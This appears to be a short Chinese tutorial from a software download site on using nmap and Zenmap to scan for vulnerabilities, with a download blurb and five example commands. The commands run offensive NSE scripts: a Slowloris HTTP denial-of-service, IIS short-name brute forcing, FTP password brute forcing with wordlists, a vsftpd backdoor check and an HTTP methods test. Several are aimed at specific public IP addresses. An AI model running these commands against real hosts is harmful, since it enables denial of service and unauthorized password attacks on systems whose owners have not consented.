nmap如何扫描漏洞？nmap扫描漏洞教程

　　Nmap是一款应用广泛的端口扫描工具，map软件内置了多种检测机制，可以轻松的辨识主机，发现其是否处于活动状态，为网络管理员提供了便利。那么使用该软件怎么扫描漏洞呢？接下来和大家分享nmap扫描漏洞教程。

 Zenmap(端口漏洞扫描工具) V7.91 中文官方版 [软件下载]

Zenmap中文官方版是一款十分专业的端口漏洞扫描工具，软件交互性好，界面更为简洁，也更为直观。可以绘制拓扑图，也可以进行配置扫描，显示相关执行的指令，以便于检查指令的正确性。Zenmap中文官方版可以记录扫描的结果，有需要的小伙伴快来下载使用吧！

　　具体如下：

　　1、http 拒绝服务：nmap --max-parallelism 800--script http-slowloris scanme.nmap.org

　　2、IIS 短文件泄露：nmap -p 8080 --script http-iis-short-name-brute 61.142.64.176

　　3、ftp弱口令暴力破解：nmap --script ftp-brute --script-args brute.emptypass=true，ftp-brute.timeout=30，userdb=/root/dirtionary/usernames.txt，brute.useraspass=true，passdb=/root/dirtionary/passwords.txt，brute.threads=3，brute.delay=6 203.195.139.153

　　4、检测CVE-2011-2523中的ftp-vsftpd-backdoor：nmap -T2 --script ftp-vsftpd-backdoor 211.139.201.240

　　5、验证http中开启的-methods 方法：nmap -T3 --script http-methods --script-args http.test-all=true，http.url-path=/www.haoshangjia.com